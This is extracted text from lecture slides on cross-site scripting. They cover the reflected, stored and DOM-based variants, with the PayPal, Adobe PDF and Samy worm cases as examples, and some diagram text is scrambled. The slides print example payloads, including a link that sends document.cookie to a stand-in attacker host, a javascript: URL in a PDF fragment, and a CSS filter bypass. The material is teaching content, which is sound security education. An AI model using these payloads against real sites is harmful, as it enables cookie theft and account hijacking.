Module 6.

3
Cross Site Scripting
XSS
Three top web site vulnerabilites

SQL Injection
Browser sends malicious input to server
Attackers malicious code
Bad input checking leads
executed to malicious
on victim server SQL query
CSRF Cross-site request forgery
Bad web site sends request to good web site,
Attacker site forges request from
using credentials of an innocent
victim browser victim who
to victim server
visits site
XSS Cross-site scripting
Attackers
Bad web site sends malicious victim
innocent code a script that
executed on victim browser
steals information from an honest web site
 Basic scenario: reflected XSS
attack
Attack Server
w e b site
t
1 visi
o u s link
e m alici
eiv
2 rec l e data
d va luab
5 sen

3
Victim client clic
4 k on
ech link
o use
r in Victim Server
put
XSS example: vulnerable
site
search field on victim.com:
http://victim.com/search.php ? term
= apple

Server-side implementation of
search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> term
echo search :
. . . into response
 Bad input
Consider link: (properly URL encoded)

http://victim.com/search.php ? term =
<script> window.open(
http://badguy.com?cookie = +
document.cookie ) </script>

What if user clicks on this link?

1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> </script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
 Attack Server

ba d li n k
se r gets
u
www.attacker.com
http://victim.com/search.php ?
term = <script> ... </script>
use
r clic
Victim client ks o
n lin
vict k
im
ech
oes
us e
r in
put Victim Server
www.victim.com
<html>
Results for
<script>
window.open(http://attacker.com?
... document.cookie ...)
</script>
</html>
 What is XSS?
An XSS vulnerability is present when an
attacker can inject scripting code into
pages generated by a web application
Methods for injecting malicious code:
Reflected XSS (type 1)
the attack script is reflected back to the user as part
of a page from the victim site
Stored XSS (type 2)
the attacker stores the malicious code in a resource
managed by the web application, such as a database
Others, such as DOM-based attacks
 Basic scenario: reflected XSS
attack
a i l addr Attack Server
Email version ct em
o l l e
1 C
e m ail
s
m a liciou
nd
2 se l e d ata
d va luab
5 sen

3
User Victim clic
4 k on
ech link
o use
r in Server Victim
put
 2006 Example
Vulnerability
Attackers contacted users via email and fooled them into
accessing a particular URL hosted on the legitimate PayPal
website.
Injected code redirected PayPal visitors to a page warning
users their accounts had been compromised.
Victims were then redirected to a phishing site and
prompted to enter sensitive financial data.

Source: http://www.acunetix.com/news/paypal.htm
 Adobe PDF viewer feature
(version <= 7.9)

PDF documents execute JavaScript

code
http://path/to/pdf/file.pdf#whatever_name
_you_want=javascript:code_here

The code will be executed in the context

of the domain where the PDF files is
hosted
This could be used against PDF files
hosted on the local filesystem
ttp://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html
 Heres how the attack
works:
Attacker locates a PDF file hosted on
website.com
Attacker creates a URL pointing to the PDF, with
JavaScript Malware in the fragment portion

http://website.com/path/to/file.pdf#s=javascript:alert(
xss);)
Attacker entices a victim to click on the link
If the victim has Adobe Acrobat Reader Plugin
7.0.x or less, confirmed in Firefox and Internet
Explorer, the JavaScript Malware executes

Note: alert is just an example. Real attacks do something worse.

 And if that doesnt bother
you...
PDF files on the local filesystem:

file:///C:/Program%20Files/Adobe/Acrobat
%207.0/Resource/ENUtxt.pdf#blah=javasc
ript:alert("XSS");

JavaScript Malware now runs in local

context with the ability to read local
files ...
 Reflected XSS attack
Send bad stuf Attack Server

l e data
d va luab
5 sen

3
User Victim clic
4 k on
ech link
o use
r in Server Victim
put
Reflect it back
 Stored XSS
Attack Server

bl e data
eal v alua
4 st

1
Inject
malicious
2 re
User Victim que script
Store bad stuf
3 re st c
ceiv o nt
en t
em
alic Server Victim
i o us
scri
pt
Download it
 MySpace.com (Samy worm)

Users can post HTML on their pages

MySpace.com ensures HTML contains no
<script>, <body>, onclick, <a href=javascript://>
but can do Javascript within CSS tags:
<div style=background:url(javascript:alert(1))>
And can hide javascript as java\nscript

With careful javascript hacking:

Samy worm infects anyone who visits an infected
MySpace page and adds Samy as a friend.
Samy had millions of friends within 24 hours.
http://namb.la/popular/tech.html
 Stored XSS using images
Suppose pic.jpg on web server contains HTML !
request for http://site.com/pic.jpg results in:

HTTP/1.1 200 OK

Content-Type: image/jpeg

<html> fooled ya </html>

IE will render this as HTML (despite Content-Type)

Consider photo sharing sites that support image uploads

What if attacker uploads an image that is a script?
 DOM-based XSS (no server
used)
Example page
<HTML><TITLE>Welcome!</TITLE>
Hi <SCRIPT>
var pos = document.URL.indexOf("name=") + 5;
document.write(document.URL.substring(pos,docum
ent.URL.length));
</SCRIPT>
</HTML>
Works fine with this URL
http://www.example.com/welcome.html?name=Joe
But what about this one?
http://www.example.com/welcome.html?name=
<script>alert(document.cookie)</script>

Amit Klein ... XSS of the Third Kind